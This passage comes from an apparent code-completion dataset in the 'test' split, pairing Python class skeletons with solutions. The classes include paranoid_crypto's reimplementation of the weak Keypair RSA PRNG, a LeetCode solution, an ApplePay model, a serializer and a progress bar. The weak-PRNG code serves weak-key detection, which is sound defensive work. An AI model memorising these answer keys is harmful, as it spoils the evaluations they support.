p_size_bits: int) -> int: Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. 
Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\n- def generate_key(self, bits: int) -> tuple[int, int]: Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.", "prompted_full_text": "Implement the Python class `Generator` described below.\n\nClass description:\nClass for generating Keypair modulus for a given seed and bit size.\n\nMethod signatures and docstrings:\n- def __init__(self, seed: bytes): Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\n- def generate_prime(self, p_size_bits: int) -> int: Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\n- def generate_key(self, bits: int) -> tuple[int, int]: Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.\n\n<|skeleton|>\nclass Generator:\n \"\"\"Class for generating Keypair modulus for a given seed and bit size.\"\"\"\n\n def __init__(self, seed: bytes):\n \"\"\"Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\"\"\"\n <|body_0|>\n\n def generate_prime(self, p_size_bits: int) -> int:\n \"\"\"Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\"\"\"\n <|body_1|>\n\n def generate_key(self, bits: int) -> tuple[int, int]:\n \"\"\"Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. 
Returns: a tuple containing the two primes of the RSA key/modulus.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n t = hashlib.sha1(seed).digest()\n key = hashlib.sha1(t).digest()\n self.orig_key = key\n seed = hashlib.sha1(key).digest()\n self.key = key[:16]\n self.seed = seed[:16]\n<|end_body_0|>\n\n<|body_start_1|>\n p_size_bytes = p_size_bits // 8\n while True:\n prime_bytes = b''\n idx = 0\n while len(prime_bytes) <= p_size_bytes:\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n prime_bytes += encryptor.update(self.seed)\n seed_inc = (int.from_bytes(self.seed, 'big') + 1).to_bytes(16, 'big')\n self.key = encryptor.update(seed_inc)\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n self.seed = encryptor.update(seed_inc)\n prime_bytes = prime_bytes[1:p_size_bytes + 1]\n p = int.from_bytes(prime_bytes, 'big')\n p |= 1 << p_size_bits - 1\n p += 31 - p % 30\n while not gmpy.is_prime(p, 1):\n p += GCD_30_DELTA[idx % 8]\n idx += 1\n if gmpy.is_prime(p, 10):\n return p\n<|end_body_1|>\n\n<|body_start_2|>\n p_size_bits = bits // 2\n p = self.generate_prime(p_size_bits)\n q = self.generate_prime(p_size_bits)\n while True:\n if q > p:\n p, q = (q, p)\n n = p * q\n if n.bit_length() == bits:\n return (p, q)\n q = self.generate_prime(p_size_bits)\n<|end_body_2|>\n", "revision_id": "16e5f47fcc11f51d3fb58b50adddd075f4373bbc", "skeleton": "<|skeleton|>\nclass Generator:\n \"\"\"Class for generating Keypair modulus for a given seed and bit size.\"\"\"\n\n def __init__(self, seed: bytes):\n \"\"\"Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\"\"\"\n <|body_0|>\n\n def generate_prime(self, p_size_bits: int) -> int:\n \"\"\"Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\"\"\"\n <|body_1|>\n\n def generate_key(self, bits: int) -> tuple[int, int]:\n \"\"\"Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Generator:\n \"\"\"Class for generating Keypair modulus for a given seed and bit size.\"\"\"\n\n def __init__(self, seed: bytes):\n \"\"\"Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\"\"\"\n t = hashlib.sha1(seed).digest()\n key = hashlib.sha1(t).digest()\n self.orig_key = key\n seed = hashlib.sha1(key).digest()\n self.key = key[:16]\n self.seed = seed[:16]\n\n def generate_prime(self, p_size_bits: int) -> int:\n \"\"\"Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. 
Returns: The generated prime.\"\"\"\n p_size_bytes = p_size_bits // 8\n while True:\n prime_bytes = b''\n idx = 0\n while len(prime_bytes) <= p_size_bytes:\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n prime_bytes += encryptor.update(self.seed)\n seed_inc = (int.from_bytes(self.seed, 'big') + 1).to_bytes(16, 'big')\n self.key = encryptor.update(seed_inc)\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n self.seed = encryptor.update(seed_inc)\n prime_bytes = prime_bytes[1:p_size_bytes + 1]\n p = int.from_bytes(prime_bytes, 'big')\n p |= 1 << p_size_bits - 1\n p += 31 - p % 30\n while not gmpy.is_prime(p, 1):\n p += GCD_30_DELTA[idx % 8]\n idx += 1\n if gmpy.is_prime(p, 10):\n return p\n\n def generate_key(self, bits: int) -> tuple[int, int]:\n \"\"\"Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.\"\"\"\n p_size_bits = bits // 2\n p = self.generate_prime(p_size_bits)\n q = self.generate_prime(p_size_bits)\n while True:\n if q > p:\n p, q = (q, p)\n n = p * q\n if n.bit_length() == bits:\n return (p, q)\n q = self.generate_prime(p_size_bits)\n", "source": "the_stack_v2_python_sparse", "source_path": "paranoid_crypto/lib/keypair_generator.py", "source_repo": "google/paranoid_crypto", "split": "test", "star_events_count": 766} {"blob_id": "e88fd9c2254cf4a1054a10ef2f7e0b7b20d470a7", "bodies": ["MOD = 10 ** 9 + 7\nN = len(A)\nA.sort()\ndp = [1] * N\nindex = {x: i for i, x in enumerate(A)}\nfor i, x in enumerate(A):\n for j in range(i):\n if x % A[j] == 0:\n right = x // A[j]\n if right in index:\n dp[i] += dp[j] * dp[index[right]]\n dp[i] %= MOD\nreturn sum(dp) % MOD", "M = 10 ** 9 + 7\nA.sort()\nn, count = (len(A), {})\nres = 0\nfor i in range(n):\n cnt = 1\n for j in range(i):\n if A[i] % A[j] == 0 and A[i] // A[j] in count:\n cnt += count[A[j]] * count[A[i] // A[j]]\n count[A[i]] = cnt % M\n res = (res + count[A[i]]) % M\nreturn res"], "bodies_text": "<|body_start_0|>\n MOD = 10 ** 9 + 7\n N = len(A)\n A.sort()\n dp = [1] * N\n index = {x: i for i, x in enumerate(A)}\n for i, x in enumerate(A):\n for j in range(i):\n if x % A[j] == 0:\n right = x // A[j]\n if right in index:\n dp[i] += dp[j] * dp[index[right]]\n dp[i] %= MOD\n return sum(dp) % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n M = 10 ** 9 + 7\n A.sort()\n n, count = (len(A), {})\n res = 0\n for i in range(n):\n cnt = 1\n for j in range(i):\n if A[i] % A[j] == 0 and A[i] // A[j] in count:\n cnt += count[A[j]] * count[A[i] // A[j]]\n count[A[i]] = cnt % M\n res = (res + count[A[i]]) % M\n return res\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def numFactoredBinaryTrees(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFactoredBinaryTrees2(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n MOD = 10 ** 9 + 7\n N = len(A)\n A.sort()\n dp = [1] * N\n index = {x: i for i, x in enumerate(A)}\n for i, x in enumerate(A):\n for j in range(i):\n if x % A[j] == 0:\n right = x // A[j]\n if right in index:\n dp[i] += dp[j] * dp[index[right]]\n dp[i] %= MOD\n return sum(dp) % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n M = 10 ** 9 + 7\n A.sort()\n n, count = (len(A), {})\n res = 0\n for i in range(n):\n cnt = 1\n for j in range(i):\n if A[i] % A[j] 
== 0 and A[i] // A[j] in count:\n cnt += count[A[j]] * count[A[i] // A[j]]\n count[A[i]] = cnt % M\n res = (res + count[A[i]]) % M\n return res\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000363", "length_bytes": 2436, "license_type": "no_license", "methods": [{"docstring": ":type A: List[int] :rtype: int", "name": "numFactoredBinaryTrees", "signature": "def numFactoredBinaryTrees(self, A)"}, {"docstring": ":type A: List[int] :rtype: int", "name": "numFactoredBinaryTrees2", "signature": "def numFactoredBinaryTrees2(self, A)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002253", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numFactoredBinaryTrees(self, A): :type A: List[int] :rtype: int\n- def numFactoredBinaryTrees2(self, A): :type A: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numFactoredBinaryTrees(self, A): :type A: List[int] :rtype: int\n- def numFactoredBinaryTrees2(self, A): :type A: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def numFactoredBinaryTrees(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFactoredBinaryTrees2(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n MOD = 10 ** 9 + 7\n N = len(A)\n A.sort()\n dp = [1] * N\n index = {x: i for i, x in enumerate(A)}\n for i, x in enumerate(A):\n for j in range(i):\n if x % A[j] == 0:\n right = x // A[j]\n if right in index:\n dp[i] += dp[j] * dp[index[right]]\n dp[i] %= MOD\n return sum(dp) % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n M = 10 ** 9 + 7\n A.sort()\n n, count = (len(A), {})\n res = 0\n for i in range(n):\n cnt = 1\n for j in range(i):\n if A[i] % A[j] == 0 and A[i] // A[j] in count:\n cnt += count[A[j]] * count[A[i] // A[j]]\n count[A[i]] = cnt % M\n res = (res + count[A[i]]) % M\n return res\n<|end_body_1|>\n", "revision_id": "635af6e22aa8eef8e7920a585d43a45a891a8157", "skeleton": "<|skeleton|>\nclass Solution:\n\n def numFactoredBinaryTrees(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFactoredBinaryTrees2(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def numFactoredBinaryTrees(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n MOD = 10 ** 9 + 7\n N = len(A)\n A.sort()\n dp = [1] * N\n index = {x: i for i, x in enumerate(A)}\n for i, x in enumerate(A):\n for j in range(i):\n if x % A[j] == 0:\n right = x // A[j]\n if right in index:\n dp[i] += dp[j] * dp[index[right]]\n dp[i] %= MOD\n return sum(dp) % MOD\n\n def numFactoredBinaryTrees2(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n M = 10 ** 9 + 7\n A.sort()\n n, count = (len(A), {})\n res = 0\n for i in range(n):\n cnt = 1\n for j in range(i):\n if A[i] % A[j] == 0 and A[i] // A[j] in count:\n cnt += count[A[j]] * count[A[i] // A[j]]\n count[A[i]] = cnt % M\n res = (res + count[A[i]]) % M\n return res\n", "source": "the_stack_v2_python_sparse", "source_path": "code823BinaryTreesWithFactors.py", "source_repo": "cybelewang/leetcode-python", "split": "test", "star_events_count": 0} {"blob_id": 
"43a27f38ee70629ed5aa7de8bcacfda8c8146891", "bodies": ["self.public_key_hash = public_key_hash\nself.ephemeral_public_key = ephemeral_public_key\nself.transaction_id = transaction_id", "if dictionary is None:\n return None\nephemeral_public_key = dictionary.get('ephemeral_public_key')\npublic_key_hash = dictionary.get('public_key_hash')\ntransaction_id = dictionary.get('transaction_id')\nreturn cls(ephemeral_public_key, public_key_hash, transaction_id)"], "bodies_text": "<|body_start_0|>\n self.public_key_hash = public_key_hash\n self.ephemeral_public_key = ephemeral_public_key\n self.transaction_id = transaction_id\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n ephemeral_public_key = dictionary.get('ephemeral_public_key')\n public_key_hash = dictionary.get('public_key_hash')\n transaction_id = dictionary.get('transaction_id')\n return cls(ephemeral_public_key, public_key_hash, transaction_id)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device", "class_name": "CreateApplePayHeaderRequest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CreateApplePayHeaderRequest:\n \"\"\"Implementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\"\"\"\n\n def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None):\n \"\"\"Constructor for the CreateApplePayHeaderRequest class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.public_key_hash = public_key_hash\n self.ephemeral_public_key = ephemeral_public_key\n self.transaction_id = transaction_id\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n ephemeral_public_key = dictionary.get('ephemeral_public_key')\n public_key_hash = dictionary.get('public_key_hash')\n transaction_id = dictionary.get('transaction_id')\n return cls(ephemeral_public_key, public_key_hash, transaction_id)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000364", "length_bytes": 2190, "license_type": "permissive", "methods": [{"docstring": "Constructor for the CreateApplePayHeaderRequest class", "name": "__init__", "signature": "def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003711", "prompt": "Implement the Python class `CreateApplePayHeaderRequest` described below.\n\nClass description:\nImplementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\n\nMethod signatures and docstrings:\n- def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None): Constructor for the CreateApplePayHeaderRequest class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `CreateApplePayHeaderRequest` described below.\n\nClass description:\nImplementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\n\nMethod signatures and docstrings:\n- def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None): Constructor for the CreateApplePayHeaderRequest class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass CreateApplePayHeaderRequest:\n \"\"\"Implementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\"\"\"\n\n def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None):\n \"\"\"Constructor for the CreateApplePayHeaderRequest class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.public_key_hash = public_key_hash\n self.ephemeral_public_key = ephemeral_public_key\n self.transaction_id = transaction_id\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n ephemeral_public_key = dictionary.get('ephemeral_public_key')\n public_key_hash = dictionary.get('public_key_hash')\n transaction_id = dictionary.get('transaction_id')\n return cls(ephemeral_public_key, public_key_hash, transaction_id)\n<|end_body_1|>\n", "revision_id": "95c80c35dd57bb2a238faeaf30d1e3b4544d2298", "skeleton": "<|skeleton|>\nclass CreateApplePayHeaderRequest:\n \"\"\"Implementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\"\"\"\n\n def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None):\n \"\"\"Constructor for the CreateApplePayHeaderRequest class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class CreateApplePayHeaderRequest:\n \"\"\"Implementation of the 'CreateApplePayHeaderRequest' model. The ApplePay header request Attributes: public_key_hash (string): SHA–256 hash, Base64 string codified ephemeral_public_key (string): X.509 encoded key bytes, Base64 encoded as a string transaction_id (string): Transaction identifier, generated on Device\"\"\"\n\n def __init__(self, ephemeral_public_key=None, public_key_hash=None, transaction_id=None):\n \"\"\"Constructor for the CreateApplePayHeaderRequest class\"\"\"\n self.public_key_hash = public_key_hash\n self.ephemeral_public_key = ephemeral_public_key\n self.transaction_id = transaction_id\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n ephemeral_public_key = dictionary.get('ephemeral_public_key')\n public_key_hash = dictionary.get('public_key_hash')\n transaction_id = dictionary.get('transaction_id')\n return cls(ephemeral_public_key, public_key_hash, transaction_id)\n", "source": "the_stack_v2_python_sparse", "source_path": "mundiapi/models/create_apple_pay_header_request.py", "source_repo": "mundipagg/MundiAPI-PYTHON", "split": "test", "star_events_count": 10} {"blob_id": "8177090727343302afe93f36330edf7e29ebb479", "bodies": ["courses = []\nuser = self.context['user']\nmodules = user.profile.purchased_modules.all()\nfor module in modules:\n course_id = self.course_in_courses(module.course.mnemo, courses)\n if course_id:\n courses[course_id[0]]['modules'].append({'mnemo': module.mnemo})\n else:\n courses.append({'mnemo': module.course.mnemo, 'modules': [{'mnemo': module.mnemo}]})\nreturn courses", "for course_id, course in enumerate(courses):\n if mnemo in course.values():\n return (course_id,)\nreturn False"], "bodies_text": "<|body_start_0|>\n courses = []\n user = self.context['user']\n modules = user.profile.purchased_modules.all()\n for module in modules:\n course_id = self.course_in_courses(module.course.mnemo, courses)\n if course_id:\n courses[course_id[0]]['modules'].append({'mnemo': module.mnemo})\n else:\n courses.append({'mnemo': module.course.mnemo, 'modules': [{'mnemo': module.mnemo}]})\n return courses\n<|end_body_0|>\n\n<|body_start_1|>\n for course_id, course in enumerate(courses):\n if mnemo in course.values():\n return (course_id,)\n return False\n<|end_body_1|>\n", "class_docstring": "", "class_name": "UserInfoSerializer", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserInfoSerializer:\n\n def get_courses(self, *args):\n \"\"\"Return purchased modules embedded in courses\"\"\"\n <|body_0|>\n\n def course_in_courses(self, mnemo, courses):\n \"\"\"Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n courses = []\n user = self.context['user']\n modules = user.profile.purchased_modules.all()\n for module in modules:\n course_id = self.course_in_courses(module.course.mnemo, courses)\n if course_id:\n courses[course_id[0]]['modules'].append({'mnemo': module.mnemo})\n else:\n courses.append({'mnemo': module.course.mnemo, 'modules': [{'mnemo': module.mnemo}]})\n return courses\n<|end_body_0|>\n\n<|body_start_1|>\n for course_id, course in enumerate(courses):\n if mnemo in course.values():\n return (course_id,)\n return False\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000365", "length_bytes": 5467, "license_type": "permissive", "methods": [{"docstring": "Return purchased modules embedded in courses", "name": "get_courses", "signature": "def get_courses(self, *args)"}, {"docstring": "Check whether corresponding to 'mnemo' course is in 'courses'. 
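The mundiapi record above defines a plain data model whose `from_dictionary` takes `cls` but whose skeleton shows no decorator. A hedged standalone sketch of the round trip — the `@classmethod` decorator is an assumption added here purely so the factory is callable on the class:

```python
class CreateApplePayHeaderRequest:
    """Standalone copy of the model in the record above (sketch only)."""

    def __init__(self, ephemeral_public_key=None, public_key_hash=None,
                 transaction_id=None):
        self.public_key_hash = public_key_hash
        self.ephemeral_public_key = ephemeral_public_key
        self.transaction_id = transaction_id

    @classmethod  # assumed decorator; the record's skeleton omits it
    def from_dictionary(cls, dictionary):
        if dictionary is None:
            return None
        return cls(dictionary.get('ephemeral_public_key'),
                   dictionary.get('public_key_hash'),
                   dictionary.get('transaction_id'))

# Round trip from a deserialized server response (illustrative values).
header = CreateApplePayHeaderRequest.from_dictionary(
    {'public_key_hash': 'hash==', 'ephemeral_public_key': 'key==',
     'transaction_id': 'abc123'})
assert header.transaction_id == 'abc123'
assert CreateApplePayHeaderRequest.from_dictionary(None) is None
```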
Return tuple (course_id,) if course mnemo found in courses, return False otherwise.", "name": "course_in_courses", "signature": "def course_in_courses(self, mnemo, courses)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003145", "prompt": "Implement the Python class `UserInfoSerializer` described below.\n\nClass description:\nImplement the UserInfoSerializer class.\n\nMethod signatures and docstrings:\n- def get_courses(self, *args): Return purchased modules embedded in courses\n- def course_in_courses(self, mnemo, courses): Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.", "prompted_full_text": "Implement the Python class `UserInfoSerializer` described below.\n\nClass description:\nImplement the UserInfoSerializer class.\n\nMethod signatures and docstrings:\n- def get_courses(self, *args): Return purchased modules embedded in courses\n- def course_in_courses(self, mnemo, courses): Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.\n\n<|skeleton|>\nclass UserInfoSerializer:\n\n def get_courses(self, *args):\n \"\"\"Return purchased modules embedded in courses\"\"\"\n <|body_0|>\n\n def course_in_courses(self, mnemo, courses):\n \"\"\"Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n courses = []\n user = self.context['user']\n modules = user.profile.purchased_modules.all()\n for module in modules:\n course_id = self.course_in_courses(module.course.mnemo, courses)\n if course_id:\n courses[course_id[0]]['modules'].append({'mnemo': module.mnemo})\n else:\n courses.append({'mnemo': module.course.mnemo, 'modules': [{'mnemo': module.mnemo}]})\n return courses\n<|end_body_0|>\n\n<|body_start_1|>\n for course_id, course in enumerate(courses):\n if mnemo in course.values():\n return (course_id,)\n return False\n<|end_body_1|>\n", "revision_id": "860d1c1214de125346c0accc4ec4b8953297231b", "skeleton": "<|skeleton|>\nclass UserInfoSerializer:\n\n def get_courses(self, *args):\n \"\"\"Return purchased modules embedded in courses\"\"\"\n <|body_0|>\n\n def course_in_courses(self, mnemo, courses):\n \"\"\"Check whether corresponding to 'mnemo' course is in 'courses'. Return tuple (course_id,) if course mnemo found in courses, return False otherwise.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserInfoSerializer:\n def get_courses(self, *args):\n \"\"\"Return purchased modules embedded in courses\"\"\"\n courses = []\n user = self.context['user']\n modules = user.profile.purchased_modules.all()\n for module in modules:\n course_id = self.course_in_courses(module.course.mnemo, courses)\n if course_id:\n courses[course_id[0]]['modules'].append({'mnemo': module.mnemo})\n else:\n courses.append({'mnemo': module.course.mnemo, 'modules': [{'mnemo': module.mnemo}]})\n return courses\n\n def course_in_courses(self, mnemo, courses):\n \"\"\"Check whether corresponding to 'mnemo' course is in 'courses'. 
Return tuple (course_id,) if course mnemo found in courses, return False otherwise.\"\"\"\n for course_id, course in enumerate(courses):\n if mnemo in course.values():\n return (course_id,)\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "src/user/serializers.py", "source_repo": "xgerinx/skillsitev2", "split": "test", "star_events_count": 0} {"blob_id": "c1bd690b5c0c4305db1daa6f2024ac6ab57f6972", "bodies": ["self.param = Config()\nself.param.width = width\nself.param.target = target\nself.param.time = time.time()\nself.param.n = 0\nself.param.unit_name = unit_name\nself.param.verbose = verbose\nself.param.current = 0\nif verbose:\n self.param.logger = Logger()", "if not self.param.verbose:\n return 0\nself.param.n += 1\nself.param.current += current\nif self.param.target is not None:\n if self.param.current > self.param.target:\n self.param.current = self.param.target\n rate = self.param.current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{self.param.current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' * (self.param.width - percent))[:self.param.width]}] \"\nelse:\n msg = f'{self.param.current}/Unknown '\ntime_diff = time.time() - self.param.time\nif self.param.target is not None:\n if self.param.current < self.param.target:\n msg = msg + f'- {rate * 100:.1f}% EAT: {int(time_diff / self.param.current * (self.param.target - self.param.current))}s'\n else:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\nelse:\n msg = msg + f'- {int(time_diff / self.param.n * 1000)}ms/{self.param.unit_name}'\nif values is not None:\n msg = msg + ' - ' + ''.join([f'{i[0]}: {i[1]} ' for i in values])\nif self.param.target is None:\n self.param.logger.info(msg + ' ' * 4, enter=False)\nelif self.param.current < self.param.target:\n self.param.logger.info(msg + ' ' * 4, enter=False)\nelse:\n self.param.logger.info(msg + ' ' * 4, enter=True)", "if not self.param.verbose:\n return 0\nself.param.n += 1\nif self.param.target is not None:\n if current > self.param.target:\n raise\n rate = current / self.param.target\n percent = int(rate * self.param.width)\n msg = f'{current}/{self.param.target} '\n msg = msg + f\"[{('=' * percent + '>' + '.' 
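In the UserInfoSerializer record above, `course_in_courses` returns a one-element tuple rather than a bare index so that a match at position 0 stays truthy in the caller's `if course_id:` test. A hedged sketch of that grouping logic, with the Django ORM access replaced by plain tuples (a substitution made only so the example runs):

```python
def course_in_courses(mnemo, courses):
    # A bare index of 0 would be falsy; the one-tuple (0,) is not.
    for course_id, course in enumerate(courses):
        if mnemo in course.values():
            return (course_id,)
    return False

def group_modules(purchased):
    # purchased: iterable of (course_mnemo, module_mnemo) pairs standing in
    # for user.profile.purchased_modules.all() in the record.
    courses = []
    for course_mnemo, module_mnemo in purchased:
        found = course_in_courses(course_mnemo, courses)
        if found:
            courses[found[0]]['modules'].append({'mnemo': module_mnemo})
        else:
            courses.append({'mnemo': course_mnemo,
                            'modules': [{'mnemo': module_mnemo}]})
    return courses

modules = [('math', 'algebra'), ('math', 'calculus'), ('cs', 'python')]
assert group_modules(modules) == [
    {'mnemo': 'math', 'modules': [{'mnemo': 'algebra'}, {'mnemo': 'calculus'}]},
    {'mnemo': 'cs', 'modules': [{'mnemo': 'python'}]},
]
```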
